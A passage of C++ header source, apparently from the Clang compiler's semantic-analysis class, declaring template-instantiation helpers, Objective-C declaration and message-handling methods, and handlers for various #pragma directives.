if (Enabled) {
S.DefineUsedVTables();
S.PerformPendingInstantiations();
}
}
~GlobalEagerInstantiationScope() {
if (!Enabled) return;
// Restore the set of pending vtables.
assert(S.VTableUses.empty() &&
"VTableUses should be empty before it is discarded.");
S.VTableUses.swap(SavedVTableUses);
// Restore the set of pending implicit instantiations.
assert(S.PendingInstantiations.empty() &&
"PendingInstantiations should be empty before it is discarded.");
S.PendingInstantiations.swap(SavedPendingInstantiations);
}
private:
Sema &S;
SmallVector<VTableUse, 16> SavedVTableUses;
std::deque<PendingImplicitInstantiation> SavedPendingInstantiations;
bool Enabled;
};
/// The queue of implicit template instantiations that are required
/// and must be performed within the current local scope.
///
/// This queue is only used for member functions of local classes in
/// templates, which must be instantiated in the same scope as their
/// enclosing function, so that they can reference function-local
/// types, static variables, enumerators, etc.
std::deque<PendingImplicitInstantiation> PendingLocalImplicitInstantiations;
class LocalEagerInstantiationScope {
public:
LocalEagerInstantiationScope(Sema &S) : S(S) {
SavedPendingLocalImplicitInstantiations.swap(
S.PendingLocalImplicitInstantiations);
}
void perform() { S.PerformPendingInstantiations(/*LocalOnly=*/true); }
~LocalEagerInstantiationScope() {
assert(S.PendingLocalImplicitInstantiations.empty() &&
"there shouldn't be any pending local implicit instantiations");
SavedPendingLocalImplicitInstantiations.swap(
S.PendingLocalImplicitInstantiations);
}
private:
Sema &S;
std::deque<PendingImplicitInstantiation>
SavedPendingLocalImplicitInstantiations;
};
/// A helper class for building up ExtParameterInfos.
class ExtParameterInfoBuilder {
SmallVector<FunctionProtoType::ExtParameterInfo, 16> Infos;
bool HasInteresting = false;
public:
/// Set the ExtParameterInfo for the parameter at the given index,
///
void set(unsigned index, FunctionProtoType::ExtParameterInfo info) {
assert(Infos.size() <= index);
Infos.resize(index);
Infos.push_back(info);
if (!HasInteresting)
HasInteresting = (info != FunctionProtoType::ExtParameterInfo());
}
/// Return a pointer (suitable for setting in an ExtProtoInfo) to the
/// ExtParameterInfo array we've built up.
const FunctionProtoType::ExtParameterInfo *
getPointerOrNull(unsigned numParams) {
if (!HasInteresting) return nullptr;
Infos.resize(numParams);
return Infos.data();
}
};
void PerformPendingInstantiations(bool LocalOnly = false);
TypeSourceInfo *SubstType(TypeSourceInfo *T,
const MultiLevelTemplateArgumentList &TemplateArgs,
SourceLocation Loc, DeclarationName Entity,
bool AllowDeducedTST = false);
QualType SubstType(QualType T,
const MultiLevelTemplateArgumentList &TemplateArgs,
SourceLocation Loc, DeclarationName Entity);
TypeSourceInfo *SubstType(TypeLoc TL,
const MultiLevelTemplateArgumentList &TemplateArgs,
SourceLocation Loc, DeclarationName Entity);
TypeSourceInfo *SubstFunctionDeclType(TypeSourceInfo *T,
const MultiLevelTemplateArgumentList &TemplateArgs,
SourceLocation Loc,
DeclarationName Entity,
CXXRecordDecl *ThisContext,
Qualifiers ThisTypeQuals);
void SubstExceptionSpec(FunctionDecl *New, const FunctionProtoType *Proto,
const MultiLevelTemplateArgumentList &Args);
bool SubstExceptionSpec(SourceLocation Loc,
FunctionProtoType::ExceptionSpecInfo &ESI,
SmallVectorImpl<QualType> &ExceptionStorage,
const MultiLevelTemplateArgumentList &Args);
ParmVarDecl *SubstParmVarDecl(ParmVarDecl *D,
const MultiLevelTemplateArgumentList &TemplateArgs,
int indexAdjustment,
Optional<unsigned> NumExpansions,
bool ExpectParameterPack);
bool SubstParmTypes(SourceLocation Loc, ArrayRef<ParmVarDecl *> Params,
const FunctionProtoType::ExtParameterInfo *ExtParamInfos,
const MultiLevelTemplateArgumentList &TemplateArgs,
SmallVectorImpl<QualType> &ParamTypes,
SmallVectorImpl<ParmVarDecl *> *OutParams,
ExtParameterInfoBuilder &ParamInfos);
ExprResult SubstExpr(Expr *E,
const MultiLevelTemplateArgumentList &TemplateArgs);
/// Substitute the given template arguments into a list of
/// expressions, expanding pack expansions if required.
///
/// \param Exprs The list of expressions to substitute into.
///
/// \param IsCall Whether this is some form of call, in which case
/// default arguments will be dropped.
///
/// \param TemplateArgs The set of template arguments to substitute.
///
/// \param Outputs Will receive all of the substituted arguments.
///
/// \returns true if an error occurred, false otherwise.
bool SubstExprs(ArrayRef<Expr *> Exprs, bool IsCall,
const MultiLevelTemplateArgumentList &TemplateArgs,
SmallVectorImpl<Expr *> &Outputs);
StmtResult SubstStmt(Stmt *S,
const MultiLevelTemplateArgumentList &TemplateArgs);
TemplateParameterList *
SubstTemplateParams(TemplateParameterList *Params, DeclContext *Owner,
const MultiLevelTemplateArgumentList &TemplateArgs);
bool
SubstTemplateArguments(ArrayRef<TemplateArgumentLoc> Args,
const MultiLevelTemplateArgumentList &TemplateArgs,
TemplateArgumentListInfo &Outputs);
Decl *SubstDecl(Decl *D, DeclContext *Owner,
const MultiLevelTemplateArgumentList &TemplateArgs);
/// Substitute the name and return type of a defaulted 'operator<=>' to form
/// an implicit 'operator=='.
FunctionDecl *SubstSpaceshipAsEqualEqual(CXXRecordDecl *RD,
FunctionDecl *Spaceship);
ExprResult SubstInitializer(Expr *E,
const MultiLevelTemplateArgumentList &TemplateArgs,
bool CXXDirectInit);
bool
SubstBaseSpecifiers(CXXRecordDecl *Instantiation,
CXXRecordDecl *Pattern,
const MultiLevelTemplateArgumentList &TemplateArgs);
bool
InstantiateClass(SourceLocation PointOfInstantiation,
CXXRecordDecl *Instantiation, CXXRecordDecl *Pattern,
const MultiLevelTemplateArgumentList &TemplateArgs,
TemplateSpecializationKind TSK,
bool Complain = true);
bool InstantiateEnum(SourceLocation PointOfInstantiation,
EnumDecl *Instantiation, EnumDecl *Pattern,
const MultiLevelTemplateArgumentList &TemplateArgs,
TemplateSpecializationKind TSK);
bool InstantiateInClassInitializer(
SourceLocation PointOfInstantiation, FieldDecl *Instantiation,
FieldDecl *Pattern, const MultiLevelTemplateArgumentList &TemplateArgs);
struct LateInstantiatedAttribute {
const Attr *TmplAttr;
LocalInstantiationScope *Scope;
Decl *NewDecl;
LateInstantiatedAttribute(const Attr *A, LocalInstantiationScope *S,
Decl *D)
: TmplAttr(A), Scope(S), NewDecl(D)
{ }
};
typedef SmallVector<LateInstantiatedAttribute, 16> LateInstantiatedAttrVec;
void InstantiateAttrs(const MultiLevelTemplateArgumentList &TemplateArgs,
const Decl *Pattern, Decl *Inst,
LateInstantiatedAttrVec *LateAttrs = nullptr,
LocalInstantiationScope *OuterMostScope = nullptr);
void
InstantiateAttrsForDecl(const MultiLevelTemplateArgumentList &TemplateArgs,
const Decl *Pattern, Decl *Inst,
LateInstantiatedAttrVec *LateAttrs = nullptr,
LocalInstantiationScope *OuterMostScope = nullptr);
bool usesPartialOrExplicitSpecialization(
SourceLocation Loc, ClassTemplateSpecializationDecl *ClassTemplateSpec);
bool
InstantiateClassTemplateSpecialization(SourceLocation PointOfInstantiation,
ClassTemplateSpecializationDecl *ClassTemplateSpec,
TemplateSpecializationKind TSK,
bool Complain = true);
void InstantiateClassMembers(SourceLocation PointOfInstantiation,
CXXRecordDecl *Instantiation,
const MultiLevelTemplateArgumentList &TemplateArgs,
TemplateSpecializationKind TSK);
void InstantiateClassTemplateSpecializationMembers(
SourceLocation PointOfInstantiation,
ClassTemplateSpecializationDecl *ClassTemplateSpec,
TemplateSpecializationKind TSK);
NestedNameSpecifierLoc
SubstNestedNameSpecifierLoc(NestedNameSpecifierLoc NNS,
const MultiLevelTemplateArgumentList &TemplateArgs);
DeclarationNameInfo
SubstDeclarationNameInfo(const DeclarationNameInfo &NameInfo,
const MultiLevelTemplateArgumentList &TemplateArgs);
TemplateName
SubstTemplateName(NestedNameSpecifierLoc QualifierLoc, TemplateName Name,
SourceLocation Loc,
const MultiLevelTemplateArgumentList &TemplateArgs);
bool Subst(const TemplateArgumentLoc *Args, unsigned NumArgs,
TemplateArgumentListInfo &Result,
const MultiLevelTemplateArgumentList &TemplateArgs);
void InstantiateExceptionSpec(SourceLocation PointOfInstantiation,
FunctionDecl *Function);
bool CheckInstantiatedFunctionTemplateConstraints(
SourceLocation PointOfInstantiation, FunctionDecl *Decl,
ArrayRef<TemplateArgument> TemplateArgs,
ConstraintSatisfaction &Satisfaction);
FunctionDecl *InstantiateFunctionDeclaration(FunctionTemplateDecl *FTD,
const TemplateArgumentList *Args,
SourceLocation Loc);
void InstantiateFunctionDefinition(SourceLocation PointOfInstantiation,
FunctionDecl *Function,
bool Recursive = false,
bool DefinitionRequired = false,
bool AtEndOfTU = false);
VarTemplateSpecializationDecl *BuildVarTemplateInstantiation(
VarTemplateDecl *VarTemplate, VarDecl *FromVar,
const TemplateArgumentList &TemplateArgList,
const TemplateArgumentListInfo &TemplateArgsInfo,
SmallVectorImpl<TemplateArgument> &Converted,
SourceLocation PointOfInstantiation, void *InsertPos,
LateInstantiatedAttrVec *LateAttrs = nullptr,
LocalInstantiationScope *StartingScope = nullptr);
VarTemplateSpecializationDecl *CompleteVarTemplateSpecializationDecl(
VarTemplateSpecializationDecl *VarSpec, VarDecl *PatternDecl,
const MultiLevelTemplateArgumentList &TemplateArgs);
void
BuildVariableInstantiation(VarDecl *NewVar, VarDecl *OldVar,
const MultiLevelTemplateArgumentList &TemplateArgs,
LateInstantiatedAttrVec *LateAttrs,
DeclContext *Owner,
LocalInstantiationScope *StartingScope,
bool InstantiatingVarTemplate = false,
VarTemplateSpecializationDecl *PrevVTSD = nullptr);
VarDecl *getVarTemplateSpecialization(
VarTemplateDecl *VarTempl, const TemplateArgumentListInfo *TemplateArgs,
const DeclarationNameInfo &MemberNameInfo, SourceLocation TemplateKWLoc);
void InstantiateVariableInitializer(
VarDecl *Var, VarDecl *OldVar,
const MultiLevelTemplateArgumentList &TemplateArgs);
void InstantiateVariableDefinition(SourceLocation PointOfInstantiation,
VarDecl *Var, bool Recursive = false,
bool DefinitionRequired = false,
bool AtEndOfTU = false);
void InstantiateMemInitializers(CXXConstructorDecl *New,
const CXXConstructorDecl *Tmpl,
const MultiLevelTemplateArgumentList &TemplateArgs);
NamedDecl *FindInstantiatedDecl(SourceLocation Loc, NamedDecl *D,
const MultiLevelTemplateArgumentList &TemplateArgs,
bool FindingInstantiatedContext = false);
DeclContext *FindInstantiatedContext(SourceLocation Loc, DeclContext *DC,
const MultiLevelTemplateArgumentList &TemplateArgs);
// Objective-C declarations.
enum ObjCContainerKind {
OCK_None = -1,
OCK_Interface = 0,
OCK_Protocol,
OCK_Category,
OCK_ClassExtension,
OCK_Implementation,
OCK_CategoryImplementation
};
ObjCContainerKind getObjCContainerKind() const;
DeclResult actOnObjCTypeParam(Scope *S,
ObjCTypeParamVariance variance,
SourceLocation varianceLoc,
unsigned index,
IdentifierInfo *paramName,
SourceLocation paramLoc,
SourceLocation colonLoc,
ParsedType typeBound);
ObjCTypeParamList *actOnObjCTypeParamList(Scope *S, SourceLocation lAngleLoc,
ArrayRef<Decl *> typeParams,
SourceLocation rAngleLoc);
void popObjCTypeParamList(Scope *S, ObjCTypeParamList *typeParamList);
Decl *ActOnStartClassInterface(
Scope *S, SourceLocation AtInterfaceLoc, IdentifierInfo *ClassName,
SourceLocation ClassLoc, ObjCTypeParamList *typeParamList,
IdentifierInfo *SuperName, SourceLocation SuperLoc,
ArrayRef<ParsedType> SuperTypeArgs, SourceRange SuperTypeArgsRange,
Decl *const *ProtoRefs, unsigned NumProtoRefs,
const SourceLocation *ProtoLocs, SourceLocation EndProtoLoc,
const ParsedAttributesView &AttrList);
void ActOnSuperClassOfClassInterface(Scope *S,
SourceLocation AtInterfaceLoc,
ObjCInterfaceDecl *IDecl,
IdentifierInfo *ClassName,
SourceLocation ClassLoc,
IdentifierInfo *SuperName,
SourceLocation SuperLoc,
ArrayRef<ParsedType> SuperTypeArgs,
SourceRange SuperTypeArgsRange);
void ActOnTypedefedProtocols(SmallVectorImpl<Decl *> &ProtocolRefs,
SmallVectorImpl<SourceLocation> &ProtocolLocs,
IdentifierInfo *SuperName,
SourceLocation SuperLoc);
Decl *ActOnCompatibilityAlias(
SourceLocation AtCompatibilityAliasLoc,
IdentifierInfo *AliasName, SourceLocation AliasLocation,
IdentifierInfo *ClassName, SourceLocation ClassLocation);
bool CheckForwardProtocolDeclarationForCircularDependency(
IdentifierInfo *PName,
SourceLocation &PLoc, SourceLocation PrevLoc,
const ObjCList<ObjCProtocolDecl> &PList);
Decl *ActOnStartProtocolInterface(
SourceLocation AtProtoInterfaceLoc, IdentifierInfo *ProtocolName,
SourceLocation ProtocolLoc, Decl *const *ProtoRefNames,
unsigned NumProtoRefs, const SourceLocation *ProtoLocs,
SourceLocation EndProtoLoc, const ParsedAttributesView &AttrList);
Decl *ActOnStartCategoryInterface(
SourceLocation AtInterfaceLoc, IdentifierInfo *ClassName,
SourceLocation ClassLoc, ObjCTypeParamList *typeParamList,
IdentifierInfo *CategoryName, SourceLocation CategoryLoc,
Decl *const *ProtoRefs, unsigned NumProtoRefs,
const SourceLocation *ProtoLocs, SourceLocation EndProtoLoc,
const ParsedAttributesView &AttrList);
Decl *ActOnStartClassImplementation(SourceLocation AtClassImplLoc,
IdentifierInfo *ClassName,
SourceLocation ClassLoc,
IdentifierInfo *SuperClassname,
SourceLocation SuperClassLoc,
const ParsedAttributesView &AttrList);
Decl *ActOnStartCategoryImplementation(SourceLocation AtCatImplLoc,
IdentifierInfo *ClassName,
SourceLocation ClassLoc,
IdentifierInfo *CatName,
SourceLocation CatLoc,
const ParsedAttributesView &AttrList);
DeclGroupPtrTy ActOnFinishObjCImplementation(Decl *ObjCImpDecl,
ArrayRef<Decl *> Decls);
DeclGroupPtrTy ActOnForwardClassDeclaration(SourceLocation Loc,
IdentifierInfo **IdentList,
SourceLocation *IdentLocs,
ArrayRef<ObjCTypeParamList *> TypeParamLists,
unsigned NumElts);
DeclGroupPtrTy
ActOnForwardProtocolDeclaration(SourceLocation AtProtoclLoc,
ArrayRef<IdentifierLocPair> IdentList,
const ParsedAttributesView &attrList);
void FindProtocolDeclaration(bool WarnOnDeclarations, bool ForObjCContainer,
ArrayRef<IdentifierLocPair> ProtocolId,
SmallVectorImpl<Decl *> &Protocols);
void DiagnoseTypeArgsAndProtocols(IdentifierInfo *ProtocolId,
SourceLocation ProtocolLoc,
IdentifierInfo *TypeArgId,
SourceLocation TypeArgLoc,
bool SelectProtocolFirst = false);
/// Given a list of identifiers (and their locations), resolve the
/// names to either Objective-C protocol qualifiers or type
/// arguments, as appropriate.
void actOnObjCTypeArgsOrProtocolQualifiers(
Scope *S,
ParsedType baseType,
SourceLocation lAngleLoc,
ArrayRef<IdentifierInfo *> identifiers,
ArrayRef<SourceLocation> identifierLocs,
SourceLocation rAngleLoc,
SourceLocation &typeArgsLAngleLoc,
SmallVectorImpl<ParsedType> &typeArgs,
SourceLocation &typeArgsRAngleLoc,
SourceLocation &protocolLAngleLoc,
SmallVectorImpl<Decl *> &protocols,
SourceLocation &protocolRAngleLoc,
bool warnOnIncompleteProtocols);
/// Build a an Objective-C protocol-qualified 'id' type where no
/// base type was specified.
TypeResult actOnObjCProtocolQualifierType(
SourceLocation lAngleLoc,
ArrayRef<Decl *> protocols,
ArrayRef<SourceLocation> protocolLocs,
SourceLocation rAngleLoc);
/// Build a specialized and/or protocol-qualified Objective-C type.
TypeResult actOnObjCTypeArgsAndProtocolQualifiers(
Scope *S,
SourceLocation Loc,
ParsedType BaseType,
SourceLocation TypeArgsLAngleLoc,
ArrayRef<ParsedType> TypeArgs,
SourceLocation TypeArgsRAngleLoc,
SourceLocation ProtocolLAngleLoc,
ArrayRef<Decl *> Protocols,
ArrayRef<SourceLocation> ProtocolLocs,
SourceLocation ProtocolRAngleLoc);
/// Build an Objective-C type parameter type.
QualType BuildObjCTypeParamType(const ObjCTypeParamDecl *Decl,
SourceLocation ProtocolLAngleLoc,
ArrayRef<ObjCProtocolDecl *> Protocols,
ArrayRef<SourceLocation> ProtocolLocs,
SourceLocation ProtocolRAngleLoc,
bool FailOnError = false);
/// Build an Objective-C object pointer type.
QualType BuildObjCObjectType(QualType BaseType,
SourceLocation Loc,
SourceLocation TypeArgsLAngleLoc,
ArrayRef<TypeSourceInfo *> TypeArgs,
SourceLocation TypeArgsRAngleLoc,
SourceLocation ProtocolLAngleLoc,
ArrayRef<ObjCProtocolDecl *> Protocols,
ArrayRef<SourceLocation> ProtocolLocs,
SourceLocation ProtocolRAngleLoc,
bool FailOnError = false);
/// Ensure attributes are consistent with type.
/// \param [in, out] Attributes The attributes to check; they will
/// be modified to be consistent with \p PropertyTy.
void CheckObjCPropertyAttributes(Decl *PropertyPtrTy,
SourceLocation Loc,
unsigned &Attributes,
bool propertyInPrimaryClass);
/// Process the specified property declaration and create decls for the
/// setters and getters as needed.
/// \param property The property declaration being processed
void ProcessPropertyDecl(ObjCPropertyDecl *property);
void DiagnosePropertyMismatch(ObjCPropertyDecl *Property,
ObjCPropertyDecl *SuperProperty,
const IdentifierInfo *Name,
bool OverridingProtocolProperty);
void DiagnoseClassExtensionDupMethods(ObjCCategoryDecl *CAT,
ObjCInterfaceDecl *ID);
Decl *ActOnAtEnd(Scope *S, SourceRange AtEnd,
ArrayRef<Decl *> allMethods = None,
ArrayRef<DeclGroupPtrTy> allTUVars = None);
Decl *ActOnProperty(Scope *S, SourceLocation AtLoc,
SourceLocation LParenLoc,
FieldDeclarator &FD, ObjCDeclSpec &ODS,
Selector GetterSel, Selector SetterSel,
tok::ObjCKeywordKind MethodImplKind,
DeclContext *lexicalDC = nullptr);
Decl *ActOnPropertyImplDecl(Scope *S,
SourceLocation AtLoc,
SourceLocation PropertyLoc,
bool ImplKind,
IdentifierInfo *PropertyId,
IdentifierInfo *PropertyIvar,
SourceLocation PropertyIvarLoc,
ObjCPropertyQueryKind QueryKind);
enum ObjCSpecialMethodKind {
OSMK_None,
OSMK_Alloc,
OSMK_New,
OSMK_Copy,
OSMK_RetainingInit,
OSMK_NonRetainingInit
};
struct ObjCArgInfo {
IdentifierInfo *Name;
SourceLocation NameLoc;
// The Type is null if no type was specified, and the DeclSpec is invalid
// in this case.
ParsedType Type;
ObjCDeclSpec DeclSpec;
/// ArgAttrs - Attribute list for this argument.
ParsedAttributesView ArgAttrs;
};
Decl *ActOnMethodDeclaration(
Scope *S,
SourceLocation BeginLoc, // location of the + or -.
SourceLocation EndLoc, // location of the ; or {.
tok::TokenKind MethodType, ObjCDeclSpec &ReturnQT, ParsedType ReturnType,
ArrayRef<SourceLocation> SelectorLocs, Selector Sel,
// optional arguments. The number of types/arguments is obtained
// from the Sel.getNumArgs().
ObjCArgInfo *ArgInfo, DeclaratorChunk::ParamInfo *CParamInfo,
unsigned CNumArgs, // c-style args
const ParsedAttributesView &AttrList, tok::ObjCKeywordKind MethodImplKind,
bool isVariadic, bool MethodDefinition);
ObjCMethodDecl *LookupMethodInQualifiedType(Selector Sel,
const ObjCObjectPointerType *OPT,
bool IsInstance);
ObjCMethodDecl *LookupMethodInObjectType(Selector Sel, QualType Ty,
bool IsInstance);
bool CheckARCMethodDecl(ObjCMethodDecl *method);
bool inferObjCARCLifetime(ValueDecl *decl);
void deduceOpenCLAddressSpace(ValueDecl *decl);
ExprResult
HandleExprPropertyRefExpr(const ObjCObjectPointerType *OPT,
Expr *BaseExpr,
SourceLocation OpLoc,
DeclarationName MemberName,
SourceLocation MemberLoc,
SourceLocation SuperLoc, QualType SuperType,
bool Super);
ExprResult
ActOnClassPropertyRefExpr(IdentifierInfo &receiverName,
IdentifierInfo &propertyName,
SourceLocation receiverNameLoc,
SourceLocation propertyNameLoc);
ObjCMethodDecl *tryCaptureObjCSelf(SourceLocation Loc);
/// Describes the kind of message expression indicated by a message
/// send that starts with an identifier.
enum ObjCMessageKind {
/// The message is sent to 'super'.
ObjCSuperMessage,
/// The message is an instance message.
ObjCInstanceMessage,
/// The message is a class message, and the identifier is a type
/// name.
ObjCClassMessage
};
ObjCMessageKind getObjCMessageKind(Scope *S,
IdentifierInfo *Name,
SourceLocation NameLoc,
bool IsSuper,
bool HasTrailingDot,
ParsedType &ReceiverType);
ExprResult ActOnSuperMessage(Scope *S, SourceLocation SuperLoc,
Selector Sel,
SourceLocation LBracLoc,
ArrayRef<SourceLocation> SelectorLocs,
SourceLocation RBracLoc,
MultiExprArg Args);
ExprResult BuildClassMessage(TypeSourceInfo *ReceiverTypeInfo,
QualType ReceiverType,
SourceLocation SuperLoc,
Selector Sel,
ObjCMethodDecl *Method,
SourceLocation LBracLoc,
ArrayRef<SourceLocation> SelectorLocs,
SourceLocation RBracLoc,
MultiExprArg Args,
bool isImplicit = false);
ExprResult BuildClassMessageImplicit(QualType ReceiverType,
bool isSuperReceiver,
SourceLocation Loc,
Selector Sel,
ObjCMethodDecl *Method,
MultiExprArg Args);
ExprResult ActOnClassMessage(Scope *S,
ParsedType Receiver,
Selector Sel,
SourceLocation LBracLoc,
ArrayRef<SourceLocation> SelectorLocs,
SourceLocation RBracLoc,
MultiExprArg Args);
ExprResult BuildInstanceMessage(Expr *Receiver,
QualType ReceiverType,
SourceLocation SuperLoc,
Selector Sel,
ObjCMethodDecl *Method,
SourceLocation LBracLoc,
ArrayRef<SourceLocation> SelectorLocs,
SourceLocation RBracLoc,
MultiExprArg Args,
bool isImplicit = false);
ExprResult BuildInstanceMessageImplicit(Expr *Receiver,
QualType ReceiverType,
SourceLocation Loc,
Selector Sel,
ObjCMethodDecl *Method,
MultiExprArg Args);
ExprResult ActOnInstanceMessage(Scope *S,
Expr *Receiver,
Selector Sel,
SourceLocation LBracLoc,
ArrayRef<SourceLocation> SelectorLocs,
SourceLocation RBracLoc,
MultiExprArg Args);
ExprResult BuildObjCBridgedCast(SourceLocation LParenLoc,
ObjCBridgeCastKind Kind,
SourceLocation BridgeKeywordLoc,
TypeSourceInfo *TSInfo,
Expr *SubExpr);
ExprResult ActOnObjCBridgedCast(Scope *S,
SourceLocation LParenLoc,
ObjCBridgeCastKind Kind,
SourceLocation BridgeKeywordLoc,
ParsedType Type,
SourceLocation RParenLoc,
Expr *SubExpr);
void CheckTollFreeBridgeCast(QualType castType, Expr *castExpr);
void CheckObjCBridgeRelatedCast(QualType castType, Expr *castExpr);
bool CheckTollFreeBridgeStaticCast(QualType castType, Expr *castExpr,
CastKind &Kind);
bool checkObjCBridgeRelatedComponents(SourceLocation Loc,
QualType DestType, QualType SrcType,
ObjCInterfaceDecl *&RelatedClass,
ObjCMethodDecl *&ClassMethod,
ObjCMethodDecl *&InstanceMethod,
TypedefNameDecl *&TDNDecl,
bool CfToNs, bool Diagnose = true);
bool CheckObjCBridgeRelatedConversions(SourceLocation Loc,
QualType DestType, QualType SrcType,
Expr *&SrcExpr, bool Diagnose = true);
bool CheckConversionToObjCLiteral(QualType DstType, Expr *&SrcExpr,
bool Diagnose = true);
bool checkInitMethod(ObjCMethodDecl *method, QualType receiverTypeIfCall);
/// Check whether the given new method is a valid override of the
/// given overridden method, and set any properties that should be inherited.
void CheckObjCMethodOverride(ObjCMethodDecl *NewMethod,
const ObjCMethodDecl *Overridden);
/// Describes the compatibility of a result type with its method.
enum ResultTypeCompatibilityKind {
RTC_Compatible,
RTC_Incompatible,
RTC_Unknown
};
/// Check whether the declared result type of the given Objective-C
/// method declaration is compatible with the method's class.
ResultTypeCompatibilityKind
checkRelatedResultTypeCompatibility(const ObjCMethodDecl *Method,
const ObjCInterfaceDecl *CurrentClass);
void CheckObjCMethodDirectOverrides(ObjCMethodDecl *method,
ObjCMethodDecl *overridden);
void CheckObjCMethodOverrides(ObjCMethodDecl *ObjCMethod,
ObjCInterfaceDecl *CurrentClass,
ResultTypeCompatibilityKind RTC);
enum PragmaOptionsAlignKind {
POAK_Native, // #pragma options align=native
POAK_Natural, // #pragma options align=natural
POAK_Packed, // #pragma options align=packed
POAK_Power, // #pragma options align=power
POAK_Mac68k, // #pragma options align=mac68k
POAK_Reset // #pragma options align=reset
};
/// ActOnPragmaClangSection - Called on well formed \#pragma clang section
void ActOnPragmaClangSection(SourceLocation PragmaLoc,
PragmaClangSectionAction Action,
PragmaClangSectionKind SecKind, StringRef SecName);
/// ActOnPragmaOptionsAlign - Called on well formed \#pragma options align.
void ActOnPragmaOptionsAlign(PragmaOptionsAlignKind Kind,
SourceLocation PragmaLoc);
/// ActOnPragmaPack - Called on well formed \#pragma pack(...).
void ActOnPragmaPack(SourceLocation PragmaLoc, PragmaMsStackAction Action,
StringRef SlotLabel, Expr *Alignment);
enum class PragmaPackDiagnoseKind {
NonDefaultStateAtInclude,
ChangedStateAtExit
};
void DiagnoseNonDefaultPragmaPack(PragmaPackDiagnoseKind Kind,
SourceLocation IncludeLoc);
void DiagnoseUnterminatedPragmaPack();
/// ActOnPragmaMSStruct - Called on well formed \#pragma ms_struct [on|off].
void ActOnPragmaMSStruct(PragmaMSStructKind Kind);
/// ActOnPragmaMSComment - Called on well formed
/// \#pragma comment(kind, "arg").
void ActOnPragmaMSComment(SourceLocation CommentLoc, PragmaMSCommentKind Kind,
StringRef Arg);
/// ActOnPragmaMSPointersToMembers - called on well formed \#pragma
/// pointers_to_members(representation method[, general purpose
/// representation]).
void ActOnPragmaMSPointersToMembers(
LangOptions::PragmaMSPointersToMembersKind Kind,
SourceLocation PragmaLoc);
/// Called on well formed \#pragma vtordisp().
void ActOnPragmaMSVtorDisp(PragmaMsStackAction Action,
SourceLocation PragmaLoc,
MSVtorDispMode Value);
enum PragmaSectionKind {
PSK_DataSeg,
PSK_BSSSeg,
PSK_ConstSeg,
PSK_CodeSeg,
};
bool UnifySection(StringRef SectionName,
int SectionFlags,
DeclaratorDecl *TheDecl);
bool UnifySection(StringRef SectionName,
int SectionFlags,
SourceLocation PragmaSectionLocation);
/// Called on well formed \#pragma bss_seg/data_seg/const_seg/code_seg.
void ActOnPragmaMSSeg(SourceLocation PragmaLocation,
PragmaMsStackAction Action,
llvm::StringRef StackSlotLabel,
StringLiteral *SegmentName,
llvm::StringRef PragmaName);
/// Called on well formed \#pragma section().
void ActOnPragmaMSSection(SourceLocation PragmaLocation,
int SectionFlags, StringLiteral *SegmentName);
/// Called on well-formed \#pragma init_seg().
void ActOnPragmaMSInitSeg(SourceLocation PragmaLocation,
StringLiteral *SegmentName);
/// Called on #pragma clang __debug dump II
void ActOnPragmaDump(Scope *S, SourceLocation Loc, IdentifierInfo *II);
/// ActOnPragmaDetectMismatch - Call on well-formed \#pragma detect_mismatch
void ActOnPragmaDetectMismatch(SourceLocation Loc, StringRef Name,
StringRef Value);
/// Are precise floating point semantics currently enabled?
bool isPreciseFPEnabled() {
return !CurFPFeatures.allowAssociativeMath() &&
!CurFPFeatures.noSignedZeros() &&
!CurFPFeatures.allowReciprocalMath() &&
!CurFPFeatures.allowApproximateFunctions();
}
/// ActOnPragmaFloatControl - Call on well-formed \#pragma float_control
void ActOnPragmaFloatControl(SourceLocation Loc, PragmaMsStackAction Action,
PragmaFloatControlKind Value);
/// ActOnPragmaUnused - Called on well-formed '\#pragma unused'.
void ActOnPragmaUnused(const Token &Identifier,
Scope *curScope,
SourceLocation PragmaLoc);
/// ActOnPragmaVisibility - Called on well formed \#pragma GCC visibility... .
void ActOnPragmaVisibility(const IdentifierInfo* VisType,
SourceLocation PragmaLoc);
NamedDecl *DeclClonePragmaWeak(NamedDecl *ND, IdentifierInfo *II,
SourceLocation Loc);
void DeclApplyPragmaWeak(Scope *S, NamedDecl *ND, WeakInfo &W);
/// ActOnPragmaWeakID - Called on well formed \#pragma weak ident.
void ActOnPragmaWeakID(IdentifierInfo* WeakName,
SourceLocation PragmaLoc,
SourceLocation WeakNameLoc);
/// ActOnPragmaRedefineExtname - Called on well formed
/// \#pragma redefine_extname oldname newname.
void ActOnPragmaRedefineExtname(IdentifierInfo* WeakName,
IdentifierInfo* AliasName,
SourceLocation PragmaLoc,
SourceLocation WeakNameLoc,
SourceLocation AliasNameLoc);
/// ActOnPragmaWeakAlias - Called on well formed \#pragma weak ident = ident.
void ActOnPragmaWeakAlias(IdentifierInfo* WeakName,
IdentifierInfo* AliasName,
SourceLocation PragmaLoc,
SourceLocation WeakNameLoc,
SourceLocation AliasNameLoc);
/// ActOnPragmaFPContract - Called on well formed
/// \#pragma {STDC,OPENCL} FP_CONTRACT and
/// \#pragma clang fp contract
void ActOnPragmaFPContract(LangOptions::FPModeKind FPC);
/// Called on well formed
/// \#pragma clang fp reassociate
void ActOnPragmaFPReassociate(bool IsEnabled);
/// ActOnPragmaFenvAccess - Called on well formed
/// \#pragma STDC FENV_ACCESS
void ActOnPragmaFEnvAccess(SourceLocation Loc, bool IsEnabled);
/// Called to set rounding mode for floating point operations.
void setRoundingMode(llvm::RoundingMode);
/// Called to set exception behavior for floating point operations.
void setExceptionMode(LangOptions::FPExceptionModeKind);
/// AddAlignmentAttributesForRecord - Adds any needed alignment attributes to
/// a the record decl, to handle '\#pragma pack' and '\#pragma options align'.
void AddAlignmentAttributesForRecord(RecordDecl *RD);
/// AddMsStructLayoutForRecord - Adds ms_struct layout attribute to record.
void AddMsStructLayoutForRecord(RecordDecl *RD);
/// FreePackedContext - Deallocate and null out PackContext.
void FreePackedContext();
/// PushNamespaceVisibilityAttr - Note that we've entered a
/// namespace with a visibility attribute.
void PushNamespaceVisibilityAttr(const VisibilityAttr *Attr,
SourceLocation Loc);
/// AddPushedVisibilityAttribute - If '\#pragma GCC visibility' was used,
/// add an appropriate visibility attribute.
void AddPushedVisibilityAttribute(Decl *RD);
/// PopPragmaVisibility - Pop the top element of the visibility stack; used
/// for '\#pragma GCC visibility' and visibility attributes on namespaces.
void PopPragmaVisibility(bool IsNamespaceEnd, SourceLocation EndLoc);
/// FreeVisContext - Deallocate and null out VisContext.
void FreeVisContext();
/// AddCFAuditedAttribute - Check whether we're currently within
/// '\#pragma clang arc_cf_code_audited' and, if so, consider adding
/// the appropriate attribute.
void AddCFAuditedAttribute(Decl *D);
